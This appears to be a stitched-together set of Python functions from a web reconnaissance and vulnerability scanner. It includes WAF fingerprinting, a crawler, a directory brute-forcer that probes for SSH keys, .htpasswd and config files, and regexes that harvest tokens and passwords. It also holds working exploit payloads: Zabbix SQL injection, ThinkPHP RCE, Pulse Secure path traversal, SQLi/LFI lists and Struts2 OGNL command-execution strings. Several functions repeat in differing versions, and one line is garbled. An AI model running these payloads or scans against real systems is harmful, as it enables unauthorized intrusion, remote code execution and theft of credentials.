def verify_https(url): # 验证域名是http或者https的 # 如果域名是302跳转 则获取跳转后的地址 req = Requests() url2 = parse.urlparse(url) if url2.netloc: url = url2.netloc elif url2.path: url = url2.path # noinspection PyBroadException try: r = req.get('https://' + url) getattr(r, 'status_code') if r.status_code == 302 or r.status_code == 301: r = req.get('https://' + 'www.' + url) if r.status_code == 200: return 'https://' + 'www.' + url return 'https://' + url except Exception as e: # noinspection PyBroadException try: req.get('http://' + url) return 'http://' + url except Exception: pass
def verify_https(url): # 验证域名是http或者https的 # 如果域名是302跳转 则获取跳转后的地址 req = Requests() # noinspection PyBroadException if '://' in url: try: r = req.get(url) return url except Exception as e: pass host = parse_host(url) url2 = parse.urlparse(url) if url2.netloc: url = url2.netloc elif url2.path: url = url2.path # noinspection PyBroadException try: r = req.get('https://' + url) getattr(r, 'status_code') console('Verify', host, 'https://' + url + '\n') return 'https://' + url except AttributeError: # noinspection PyBroadException try: req.get('http://' + url) console('Verify', host, 'http://' + url + '\n') return 'http://' + url except Exception: pass except Exception as e: logging.exception(e)
def checkwaf(url): try: req = Requests() r = req.get(url) result = verify(r.headers, r.text[:10000]) if result == 'NoWAF': for i in payload: r = req.get(url + i) result = verify(r.headers, r.text[:10000]) return result except: return 'NoWAF'
def verify_https(url): req = Requests() url2 = parse.urlparse(url) if url2.netloc: url = url2.netloc elif url2.path: url = url2.path try: req.get('https://' + url) return 'https://' + url except Exception as e: try: req.get('http://' + url) return 'http://' + url except: pass
class JsLeaks(): def __init__(self): self.result = [] self.req = Requests() def pool(self, urls): try: with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor: result = {executor.submit(self.get_js, i): i for i in urls} for future in concurrent.futures.as_completed(result, timeout=3): future.result() except (EOFError, concurrent.futures._base.TimeoutError): pass except Exception as e: logging.exception(e) return self.result def verify(self, text): result = True for i in text: if not re.search(r'^0\d\.\d+\.\d+\.\d+|google|png$|gif$|jpg$|\b\d+\.\d+\.0\.0', i): result = False break return result def get_js(self, url): r = self.req.get(url) regex = ( # 匹配url r'\b(?:http:|https:)(?:[\w/\.]+)?(?:[a-zA-Z0-9_\-\.]{1,})\.(?:php|asp|ashx|jspx|aspx|jsp|json|action|html|txt|xml|do|js)\b', r'([a-zA-Z0-9_\-]{1,}\.(?:php|asp|aspx|jsp|json|action|html|js|txt|xml)(?:\?[^\"|\']{0,}|))', # 匹配邮箱 r'[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(?:\.[a-zA-Z0-9_-]+)+', # 匹配token或者密码泄露 # 例如token = xxxxxxxx, 或者"apikey" : "xssss" r'\b(?:secret|secret_key|token|secret_token|auth_token|access_token|username|password|aws_access_key_id|aws_secret_access_key|secretkey|authtoken|accesstoken|access-token|authkey|client_secret|bucket|extr|HEROKU_API_KEY|SF_USERNAME|PT_TOKEN|id_dsa|clientsecret|client-secret|encryption-key|pass|encryption_key|encryptionkey|secretkey|secret-key|bearer|JEKYLL_GITHUB_TOKEN|HOMEBREW_GITHUB_API_TOKEN|api_key|api_secret_key|api-key|private_key|client_key|client_id|sshkey|ssh_key|ssh-key|privatekey|DB_USERNAME|oauth_token|irc_pass|dbpasswd|xoxa-2|xoxrprivate-key|private_key|consumer_key|consumer_secret|access_token_secret|SLACK_BOT_TOKEN|slack_api_token|api_token|ConsumerKey|ConsumerSecret|SESSION_TOKEN|session_key|session_secret|slack_token|slack_secret_token|bot_access_token|passwd|api|eid|sid|qid|api_key|apikey|userid|user_id|user-id|uid|private|BDUSS|stoken|imei|imsi|nickname|appid|uname)["\s]*(?::|=|=:|=>)["\s]*[a-z0-9A-Z]{8,64}', # 匹配 r'(?:[^a-fA-F\d]|\b)(?:[a-fA-F\d]{32})(?:[^a-fA-F\d]|\b)', # 匹配 "/task/router" 这种路径 r'"(/\w{3,}/\w{3,})"', # 匹配IP地址 r'\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b', # 匹配云泄露 r'[\w]+\.cloudfront\.net', r'[\w\-.]+\.appspot\.com', r'[\w\-.]*s3[\w\-.]*\.?amazonaws\.com\/?[\w\-.]*', r'([\w\-.]*\.?digitaloceanspaces\.com\/?[\w\-.]*)', r'(storage\.cloud\.google\.com\/[\w\-.]+)', r'([\w\-.]*\.?storage.googleapis.com\/?[\w\-.]*)', # 匹配手机号 r'(?:139|138|137|136|135|134|147|150|151|152|157|158|159|178|182|183|184|187|188|198|130|131|132|155|156|166|185|186|145|175|176|133|153|177|173|180|181|189|199|170|171)[0-9]{8}' # 匹配域名 r'((?:[a-zA-Z0-9](?:[a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?\.)+(?:biz|cc|club|cn|com|co|edu|fun|group|info|ink|kim|link|live|ltd|mobi|net|online|org|pro|pub|red|ren|shop|site|store|tech|top|tv|vip|wang|wiki|work|xin|xyz|me))' ) for _ in regex: text = re.findall(_, r.text[:100000], re.M | re.I) if text is not None and self.verify(text): text = list(map(lambda x: url + ' Leaks: ' + x, text)) self.result.extend(text)
def get_info(url): try: req = Requests() url = url + '/solr/' r = req.get(url) if r.status_code is 200 and 'Solr Admin' in r.text and 'Dashboard' in r.text: return 'Apache Solr Admin leask: ' + url except Exception: pass
def check(url, ip, ports, apps): req = Requests() if verify(vuln, ports, apps): payload = r"/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17" try: r = req.get(url + payload) if ('ed733b8d10be225eceba344d533586' in r.text) or ('SQL error ' in r.text): return 'CVE-2016-10134 zabbix sqli:' + url except Exception as e: pass
def check(url, ip, ports, apps): req = Requests() if verify(vuln, ports, apps): payload = r"/index.php/?s=/index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1" try: r = req.get(url + payload) if ('PHP Version' in r.text) or ('PHP Extension Build' in r.text): return 'thinkphp5_rce_1 | ' + url except Exception as e: pass
def check(url, ip, ports, apps): req = Requests() if verify(vuln, ports, apps): payload = r"/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/" try: r = req.get(url + payload) if 'root:x:0:0:root' in r.text: return 'CVE-2019-11510 Pulse Connect Secure File | ' + url except Exception as e: pass
def check(url, ip, ports, apps): req = Requests() if verify(vuln, ports, apps): try: url = url + '/solr/' r = req.get(url) if r.status_code is 200 and 'Solr Admin' in r.content and 'Dashboard' in r.content: return 'Apache Solr Admin leask' except Exception: pass
def get_info(url): try: req = Requests() for i in path: r = req.get(url + i) if r.status_code == 200: if '<title>phpinfo()' in r.text or 'php_version' in r.text: return 'phpinfo leaks: ' + url + i except: pass
def get_info(url): try: req = Requests() for i in path: r = req.get(url + i) if r.status_code == 200 and '<html>' not in r.text: if not re.search(r'{"\w+":', r.text): if verify(r.text): return 'leaks : ' + url + i except: pass
def check(url, ip, ports, apps): req = Requests() if verify(vuln, ports, apps): payload = "//www.example.com" try: r = req.get(url + payload) if r.is_redirect and 'www.example.com' in r.headers.get( 'Location'): return 'Django < 2.0.8 任意URL跳转漏洞' except Exception as e: pass
def get_info(url): try: req = Requests() for i in path: r = req.get(url + i) if r.status_code == 200 and '<html' not in r.text: if not re.search(r'{"\w+":|<head>|<form\s|<div\s|<input\s|<html|</a>|Active connections', r.text): if verify(r.text): return 'leaks : ' + url + i except: pass
def checkwaf(url): try: req = Requests() r = req.get(url) result = verify(r.headers, r.text[:10000]) if result == 'NoWAF': for i in payload: r = req.get(url + i) result = verify(r.headers, r.text[:10000]) if result != 'NoWAF': return result except UnboundLocalError: pass except Exception as e: logging.exception(e) host = parse_host(url) if not iscdn(host): return 'CDN IP' return 'NoWAF'
class SqlLfi(): def __init__(self): self.result = [] self.req = Requests() def sqli(self, qurl): payload = { "'", "%2527", "')", " AnD 7738=8291" } LFI_payload = {'../../../../etc/passwd|root:x', '../../../../etc/group|root:x', 'random.php|Failed opening', 'file://c:/windows/win.ini|drivers', '/proc/self/environ|USER='******'{} SQLi:{}'.format(dbms, qurl) self.result.append(result) raise Getoutofloop for i in LFI_payload: url = '' lfi, pattern = i.split('|') if re.search(r'=\w+\.\w{3}$', qurl): url = re.sub(r'\w+\.\w{3}$', lfi, qurl) elif re.search('=\w+', qurl): url = re.sub(r'\w+$', lfi, qurl) r = self.req.get(url) if re.search(pattern, r.text, re.S): self.result.append('LFI: {}'.format(url)) break except: pass def pool(self, urls): host = dedup_url(urls) with concurrent.futures.ThreadPoolExecutor( max_workers=30) as executor: executor.map(self.sqli, host) return self.result
def robots(url): result = '' try: req = Requests() r = req.get(url + '/robots.txt') if r.status_code == 200 and '<html' not in r.text: result = re.findall(r"/[\w\?\.=/]+/?", r.text) if result: return list(set(result)) except (UnboundLocalError, AttributeError): pass except Exception as e: logging.exception(e)
def checkwaf(url): result = 'NoWAF' host = parse_host(url) if not iscdn(host): return 'CDN IP' try: req = Requests() r = req.get(url) result = verify(r.headers, r.text) if result == 'NoWAF': for i in payload: r = req.get(url + i) result = verify(r.headers, r.text) if result != 'NoWAF': return result else: return result except (UnboundLocalError, AttributeError): pass except Exception as e: logging.exception(e)
def get_info(url): try: req = Requests() for i in path: r = req.get(url + i) if r.status_code == 200: if re.search( r'admin|login|manager|登陆|管理|后台|type="password"|入口|admin_passwd', r.text, re.S): if verify(r.text): return 'Admin_Page : ' + url + i elif r.status_code == 403: return 'May be the login page : ' + url + i except: pass
def ipinfo(host): out = [] if not re.search(r'\d+\.\d+\.\d+\.\d+', host): req = Requests() try: r = req.get( 'https://viewdns.info/iphistory/?domain={}'.format(host)) result = re.findall( r'(?<=<tr><td>)\d+\.\d+\.\d+\.\d+(?=</td><td>)', r.text, re.S | re.I) if result: for i in result: if iscdn(i): out.append(i) except: pass return out
def web_info(url): host = parse_host(url) ipaddr = parse_ip(host) url = url.strip('/') address = geoip(ipaddr) wafresult = checkwaf(url) req = Requests() # noinspection PyBroadException try: r = req.get(url) coding = chardet.detect(r.content).get('encoding') r.encoding = coding webinfo = WebPage(r.url, r.text, r.headers).info() except Exception as e: logging.exception(e) webinfo = {} if webinfo: console('Webinfo', host, 'title: {}\n'.format(webinfo.get('title'))) console('Webinfo', host, 'Fingerprint: {}\n'.format(webinfo.get('apps'))) console('Webinfo', host, 'Server: {}\n'.format(webinfo.get('server'))) console('Webinfo', host, 'WAF: {}\n'.format(wafresult)) else: webinfo = {} wafresult = 'None' if iscdn(host): osname = osdetect(host) else: osname = None data = { host: { 'WAF': wafresult, 'Ipaddr': ipaddr, 'Address': address, 'Webinfo': webinfo, 'OS': osname, } } return data, webinfo.get('apps'), webinfo.get('title')
def web_info(url): host = parse_host(url) ipaddr = parse_ip(host) url = url.strip('/') address = geoip(ipaddr) wafresult = checkwaf(url) req = Requests() try: r = req.get(url) coding = chardet.detect(r.content).get('encoding') r.encoding = coding webinfo = WebPage(r.url, r.text, r.headers).info() except Exception as e: webinfo = {} if webinfo: console('Webinfo', host, 'Title: {}\n'.format(webinfo.get('title'))) console('Webinfo', host, 'Fingerprint: {}\n'.format(webinfo.get('apps'))) console('Webinfo', host, 'Server: {}\n'.format(webinfo.get('server'))) console('Webinfo', host, 'WAF: {}\n'.format(wafresult)) else: webinfo = {} wafresult = 'None' if iscdn(host): osname = osdetect(host) else: osname = None pdns = virustotal(host) reverseip = reverse_domain(host) webinfo.update({"pdns": pdns}) webinfo.update({"reverseip": reverseip}) data = { host: { 'WAF': wafresult, 'Ipaddr': ipaddr, 'Address': address, 'Webinfo': webinfo, 'OS': osname, } } return data, webinfo.get('apps')
class crawl(): def __init__(self, host): self.links = [] self.urls = [] self.js = [] self.host = host self.result = [] self.req = Requests() def jsparse(self, r): html = etree.HTML(r.text) result = html.xpath('//script/@src') for i in result: if not re.search( 'jquery|bootstrap|adsbygoogle|javascript|#|vue|react|51.la', i): if '://' not in i: i = self.host + i self.js.append(i) def extr(self, body): email = re.search( r'[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(?:\.[a-zA-Z0-9_-]+)+', body).group() if email: self.result.append('Email Leaks: {}'.format(email)) phone = re.search( r'(?:139|138|137|136|135|134|147|150|151|152|157|158|159|178|182|183|184|187|188|198|130|131|132|155|156|166|185|186|145|175|176|133|153|177|173|180|181|189|199|170|171)[0-9]{8}', body).group() if phone: self.result.append('Phone Leaks: {}'.format(phone)) def parse_html(self, host): try: exts = ['asp', 'php', 'jsp', 'do', 'aspx', 'action', 'do', 'html'] r = self.req.get(host) self.jsparse(r) self.extr(r.text) tmp = html.document_fromstring(r.text) tmp.make_links_absolute(self.host) links = tmp.iterlinks() for i in links: i = i[2] ext = parse.urlparse(i)[2].split('.')[-1] if ext in exts: # 带参数的直接加入列表,不带参数的需要二次访问 if re.search('=', i) or re.search('/\?\w+=\w+', i): self.links.append(i) else: self.urls.append(i) except Exception as e: pass return list(set(self.urls)) def pool(self): result = self.parse_html(self.host) with concurrent.futures.ThreadPoolExecutor(max_workers=30) as executor: executor.map(self.parse_html, result) jslink = JsLeaks().pool(self.js) sql = SqlLfi().pool(self.links) self.result.extend(jslink) self.result.extend(sql) return self.result
class crawl(): def __init__(self, host): self.links = [] self.urls = [] self.js = [] self.domain = '' self.host = host self.result = [] self.req = Requests() def jsparse(self, r): try: html = etree.HTML(r.text) result = html.xpath('//script/@src') for i in result: if not re.search( r'jquery|bootstrap|adsbygoogle|javascript|#|vue|react|51.la/=', i): if '://' not in i: i = re.sub(r'^/|^\.\./', '', i) i = self.host + '/' + i self.js.append(i) except (AttributeError, AttributeError, ValueError): pass except Exception as e: logging.exception(e) def dedup_url(self, urls): urls = list(set(urls)) result = [] okurl = [] for i in urls: urlparse = parse.urlparse(i) path = urlparse.path if path and path.split('/')[-2]: key = path.split('/')[-2] if key not in result: result.append(key) okurl.append(i) else: okurl.append(i) return okurl def extr(self, url, body): email = re.findall( r'\b[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(?:\.[a-zA-Z0-9_-]+)+', body) if email: self.result.extend( list(map(lambda x: 'URL: ' + url + ' Email: ' + x, email))) phone = re.findall( r'\b(?:139|138|137|136|135|134|147|150|151|152|157|158|159|178|182|183|184|187|188|198|130|131|132|155|156|166|185|186|145|175|176|133|153|177|173|180|181|189|199|170|171)[0-9]{8}\b', body) if phone: self.result.extend( list(map(lambda x: 'URL: ' + url + ' Phone: ' + x, phone))) ipaddr = re.findall( r'(?<=<!--).*((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)).*(?=-->)', body) if ipaddr: self.result.extend(list(map(lambda x: 'IP: ' + x, ipaddr))) links = re.findall( r'(?<=<!--).*((?:http|https):[\w\./\?=&]+)".*(?=-->)', body) if links: self.result.extend(list(map(lambda x: 'Links: ' + x, links))) links2 = re.findall(r'(?<=<!--).*a\shref="([\w\.\?=\&/]+)".*(?=-->)', body) if links2: self.result.extend(list(map(lambda x: 'Links: ' + x, links2))) def parse_html(self, host): try: r = self.req.get(host) self.jsparse(r) self.extr(r.url, r.text) urlparse = parse.urlparse(host) domain = urlparse.netloc if not self.domain: self.domain = domain html = etree.HTML(r.text) result = html.xpath('//a/@href') for link in result: if not re.search('#|mail*|^/$|javascript', link): if 'http' not in link: if urlparse.netloc: link = urlparse.scheme + '://' + urlparse.netloc + '/' + link else: link = 'http://' + host + '/' + link if domain in link: # 带参数的直接加入列表,不带参数的需要二次访问 if re.search('=', link) or re.search( r'/\?\w+=\w+', link): self.links.append(link) else: self.urls.append(link) except (UnboundLocalError, AttributeError): pass except Exception as e: logging.exception(e) self.urls = self.dedup_url(self.urls) return list(set(self.urls)) def pool(self): result = self.parse_html(self.host) with concurrent.futures.ThreadPoolExecutor(max_workers=30) as executor: executor.map(self.parse_html, result) jslink = JsLeaks().pool(self.js) self.result.extend(jslink) self.links = dedup_link(self.links) self.links = list(map(lambda x: 'Dynamic: ' + x, self.links)) self.result.extend(self.links) self.result = list(set(self.result)) for i in self.result: console('Crawl', self.host, i + '\n') Sqldb('result').get_crawl(self.domain, self.result)
class DirScan(): def __init__(self, dbname, apps, host): self.notstr = '' self.apps = apps self.notlen = '' self.goto = '' self.host = host self.title = '' self.dbname = dbname self.outjson = [] self.req = Requests() def get_urls(self, domain): wordlist = [] robot = robots(domain) domain = domain.replace('http://', '').replace('https://', '').rstrip('/') domain2 = re.sub(r'\.', '_', domain) domain3 = domain.strip('www.') ext = verify_ext(self.apps) ext = list(map(lambda x: '.' + x, ext)) path = [] for txt in glob.glob(r'data/path/*.txt'): with open(txt, 'r', encoding='utf-8') as f: for i in f.readlines(): path.append(i.strip()) leaks = Cartesian() leaks.add_data([ '/www', '/1', '/2016', '/2017', '/2018', '/2019', '/wwwroot', '/backup', '/index', '/web', '/test', '/tmp', '/default', '/temp', '/website', '/upload', '/bin', '/bbs', '/www1', '/www2', '/log', '/extra', '/file', '/qq', '/up', '/config', '/' + domain, '/userlist', '/dev', '/a', '/123', '/sysadmin', '/localhost', '/111', '/access', '/old', '/i', '/vip', '/index.php', '/global', '/key', '/webroot', '/out', '/server', ]) leaks.add_data([ '.tar.gz', '.zip', '.rar', '.sql', '.7z', '.bak', '.tar', '.txt', '.tgz', '.swp', '~', '.old', '.tar.bz2', '.data', '.csv' ]) path.extend(leaks.build()) index = Cartesian() index.add_data([ '/1', '/l', '/info', '/index', '/admin', '/login', '/qq', '/q', '/search', '/install', '/default', '/cmd', '/upload', '/test', '/manage', '/loading', '/left', '/zzzz', '/welcome', '/ma', '/66' ]) index.add_data(ext) path.extend(index.build()) path.extend(wordlist) if robot: path.extend(robot) return list(set(path)) def _verify(self, url, code, contype, length, goto, text, title): # 验证404页面 try: result = True if code in BLOCK_CODE: result = False if contype in BLOCK_CONTYPE: result = False if length == self.notlen: result = False # 调转等于404页面的调转时 if goto == self.goto: result = False # url在跳转路径中 if (url in goto) or (goto in url): result = False if url.strip('/') == self.goto or url.strip('/') == goto: result = False for i in PAGE_404: if i in text: result = False break if title == self.title and title != 'None': result = False # 有些302跳转会在location里出现error或者404等关键字 if re.search(r'forbidden|error|404', goto): result = False # 文件内容类型对不上的情况 if re.search( r'\.bak$|\.zip$|\.rar$|\.7z$|\.old$|\.htaccess$|\.csv$|\.txt$|\.sql$|\.tar$|\.tar.gz$', url) and contype == 'html': result = False return result except: return False def parse_html(self, text): result = [] soup = BeautifulSoup(text, 'html.parser') for i in soup.find_all(['a', 'img', 'script']): if i.get('src'): result.append(i.get('src')) if i.get('href'): result.append(i.get('href')) return result def check404(self, url): # 访问一个随机的页面记录404页面的长度与内容 key = str(random.random() * 100) random_url = base64.b64encode(key.encode('utf-8')) url = url + '/' + random_url.decode('utf-8') + '.html' try: self.notstr = '404page' r = self.req.get(url) if r.status_code == '200': coding = chardet.detect(r.content[:10000]).get('encoding') if coding: text = r.content[:20000].decode(coding) self.notstr = self.parse_html(text) self.notlen = r.headers.get('Content-Length') if not self.notlen: self.notlen = len(r.content) if r.is_redirect: self.goto = r.headers['Location'] except (requests.exceptions.ConnectTimeout, requests.exceptions.ReadTimeout, requests.exceptions.Timeout, requests.exceptions.SSLError, requests.exceptions.ConnectionError, ssl.SSLError, AttributeError, ConnectionRefusedError, socket.timeout, urllib3.exceptions.ReadTimeoutError, urllib3.exceptions.ProtocolError, OpenSSL.SSL.WantReadError): pass except UnboundLocalError: pass except Exception as e: logging.exception(e) def scan(self, host): try: r = self.req.scan(host) if r.is_redirect: goto = r.headers.get('Location') else: goto = 'test' if r.headers.get('Content-Type'): contype = re.sub(r'\w+/', '', str(r.headers.get('Content-Type'))) contype = re.sub(r';.*', '', contype) else: contype = 'None' rsp_len = r.headers.get('Content-Length') # 判断是不是网页或者文本,如果是其他文件coding将置为空 ishtml = False if contype == 'html': ishtml = True content = r.raw.read() else: content = r.raw.read(25000) if ishtml: coding = chardet.detect(content).get('encoding') if coding: text = content.decode(coding) title = re.search('(?<=<title>).*(?=</title>)', text) else: text = 'Other' title = None else: text = 'Other' title = None if not rsp_len: rsp_len = len(content) urlresult = parse.urlparse(host) if self._verify(urlresult.path, r.status_code, contype, rsp_len, goto, text, title): result = 0 if ishtml: pagemd5 = self.parse_html(text) if pagemd5 == self.notstr: result = 1 if result < 0.5: if title is None: title = 'None' else: title = title.group() title = re.sub(r'\n|\t', '', title) console('URLS', urlresult.netloc, urlresult.path + '\n') data = { urlresult.netloc: { "rsp_code": r.status_code, "rsp_len": rsp_len, "title": title, "contype": contype, "url": urlresult.path } } self.outjson.append(data) r.close() except (requests.exceptions.ConnectTimeout, requests.exceptions.ReadTimeout, requests.exceptions.Timeout, requests.exceptions.SSLError, requests.exceptions.ConnectionError, ssl.SSLError, AttributeError, ConnectionRefusedError, socket.timeout, urllib3.exceptions.ReadTimeoutError, urllib3.exceptions.ProtocolError, OpenSSL.SSL.WantReadError): pass except (UnboundLocalError, AttributeError): pass except Exception as e: logging.exception(host) logging.exception(e) try: r.close() except: pass return 'OK' def save(self, urls): Sqldb(self.dbname).get_urls(urls) def run(self, task): try: with concurrent.futures.ThreadPoolExecutor( max_workers=THREADS) as executor: futures = [executor.submit(self.scan, i) for i in task] for future in concurrent.futures.as_completed(futures, timeout=3): future.result() except (EOFError, concurrent.futures._base.TimeoutError): pass # 创建启动任务 def pool(self): host = self.host.strip('/') self.check404(host) task = [] urls = self.get_urls(host) random.shuffle(urls) for url in urls: task.append(host + url) self.run(task) # 保存结果 self.save(self.outjson)
class struts(): def __init__(self, ip): self.url = ip self.result = [] self.random = random.randint(100000000, 200000000) self.win = 'set /a ' + str(self.random) self.linux = 'echo ' + str(self.random) self.timeout = 3 self.req = Requests() def st016(self): payload = r"/default.action?redirect:%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23f.setAccessible%28true%29%2C%23f.set%28%23_memberAccess%2Ctrue%29%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27" + self.linux + "%27%29.getInputStream%28%29%29%7D" try: r = self.req.get(self.url + payload) if str(self.random) in r.headers['Location'] and len( r.headers['Location']) < 15: self.result.append('Apache S2-016 Vulnerability: ' + self.url) except: pass def st032(self): payload = r"/?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd={}&pp=\\A&ppp=%20&encoding=UTF-8".format( self.linux) try: r = self.req.get(self.url + payload) if str(self.random) in r.text and len(r.text) < 11: self.result.append('Apache S2-032 Vulnerability: ' + self.url) except: pass def st045(self): try: cmd = self.linux header = dict() header[ "User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" header[ "Content-Type"] = "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#iswin?(#cmd='" + cmd + "'):(#cmd='" + cmd + "')).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" r = request.Request(self.url, headers=header) text = request.urlopen(r).read() except http.client.IncompleteRead as e: text = e.partial except: pass if 'text' in locals().keys(): self.random = str(self.random) if self.random.encode('utf-8') in text and len(text) < 15: self.result.append('Apache S2-045 Vulnerability: ' + self.url) def st048(self): cmd = self.linux payload = "name=%25%7B%28%23_%3D%27multipart%2fform-data%27%29.%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%[email protected]@class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27" + cmd + "%27%29.%28%23iswin%3D%[email protected]@getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2fc%27%2C%23cmd%7D%3A%7B%27%2fbin%2fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%[email protected]@getResponse%28%29.getOutputStream%28%29%29%29.%[email protected]@copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D&age=123&__cheackbox_bustedBefore=true&description=123" payload = payload.encode('utf-8') try: r = request.urlopen(self.url + '/integration/saveGangster.action', payload) text = r.read() except http.client.IncompleteRead as e: text = e.partial except: pass if 'text' in locals().keys(): self.random = str(self.random) if self.random.encode('utf-8') in text and len(text) < 15: self.result.append('Apache S2-048 Vulnerability: ' + self.url) def run(self): self.st032() self.st045() self.st016() self.st048() return self.result
class DirScan(): def __init__(self, dbname): self.notstr = '' self.notlen = '' self.goto = '' self.title = '' self.dbname = dbname self.ext = 'asp,php' self.outjson = [] self.req = Requests() def get_urls(self, domain): domain = domain.replace('http://', '').replace('https://', '').rstrip('/') ext = self.ext.split(',') ext = list(map(lambda x: '.' + x, ext)) path = [ "/robots.txt", "/README.md", "/crossdomain.xml", "/.git/config", "/.hg" "/.git/index", "/.svn/entries", "/.svn/wc.db", "/.DS_Store", "/CVS/Root", "/CVS/Entries", "/.idea/workspace.xml", "/nginx_status", "/.mysql_history", "/login/", "/phpMyAdmin", "/pma/", "/pmd/", "/SiteServer", "/admin/", "/Admin/", "/manage", "/manager/", "/manage/html", "/resin-admin", "/resin-doc", "/axis2-admin", "/admin-console", "/system", "/wp-admin", "/uc_server", "/debug", "/Conf", "/webmail", "/service", "/memadmin", "/owa", "/harbor", "/master", "/root", "/xmlrpc.php", "/phpinfo.php", "/zabbix", "/api", "/backup", "/inc", "/web.config", "/httpd.conf", "/local.conf", "/sitemap.xml", "/app.config", "/.bash_history", "/.rediscli_history", "/.bashrc", "/.history", "/nohup.out", "/.mysql_history", "/server-status", "/solr/", "/examples/", "/examples/servlets/servlet/SessionExample", "/manager/html", "/login.do", "/config/database.yml", "/database.yml", "/db.conf", "/db.ini", "/jmx-console/HtmlAdaptor", "/cacti/", "/jenkins/script", "/memadmin/index.php", "/pma/index.php", "/phpMyAdmin/index.php", "/.git/HEAD", "/.gitignore", "/.ssh/known_hosts", "/.ssh/id_rsa", "/id_rsa", "/.ssh/authorized_keys", "/app.cfg", "/.mysql.php.swp", "/.db.php.swp", "/.database.php.swp", "/.settings.php.swp", "/.config.php.swp", "/config/.config.php.swp", "/.config.inc.php.swp", "/config.inc.php.bak", "/php.ini", "/sftp-config.json", "/WEB-INF/web.xml", "/WEB-INF/web.xml.bak", "/WEB-INF/config.xml", "/WEB-INF/struts-config.xml", "/server.xml", "/config/database.yml", "/WEB-INF/database.properties", "/WEB-INF/log4j.properties", "/WEB-INF/config/dbconfig", "/fckeditor/_samples/default.html", "/ckeditor/samples/", "/ueditor/ueditor.config.js", "/javax.faces.resource...%2fWEB-INF/web.xml.jsf", "/wp-config.php", "/configuration.php", "/sites/default/settings.php", "/config.php", "/config.inc.php", "/data/config.php", "/data/config.inc.php", "/data/common.inc.php", "/include/config.inc.php", "/WEB-INF/classes/", "/WEB-INF/lib/", "/WEB-INF/src/", "/.bzr", "/SearchPublicRegistries.jsp", "/.bash_logout", "/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/profile", "/test2.html", "/conf.ini", "/index.tar.tz", "/index.cgi.bak", "/WEB-INF/classes/struts.xml", "/package.rar", "/WEB-INF/applicationContext.xml", "/mysql.php", "/apc.php", "/zabbix/", "/script", "/editor/ckeditor/samples/", "/upfile.php", "/conf.tar.gz", "/WEB-INF/classes/conf/spring/applicationContext-datasource.xml", "/output.tar.gz", "/.vimrc", "/INSTALL.TXT", "/pool.sh", "/database.sql.gz", "/o.tar.gz", "/upload.sh", "/WEB-INF/classes/dataBase.properties", "/b.php", "/setup.sh", "/db.php.bak", "/WEB-INF/classes/conf/jdbc.properties", "/WEB-INF/spring.xml", "/.htaccess", "/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp", "/.htpasswd", "/id_dsa", "/WEB-INF/conf/activemq.xml", "/config/config.php", "/.idea/modules.xml", "/WEB-INF/spring-cfg/applicationContext.xml", 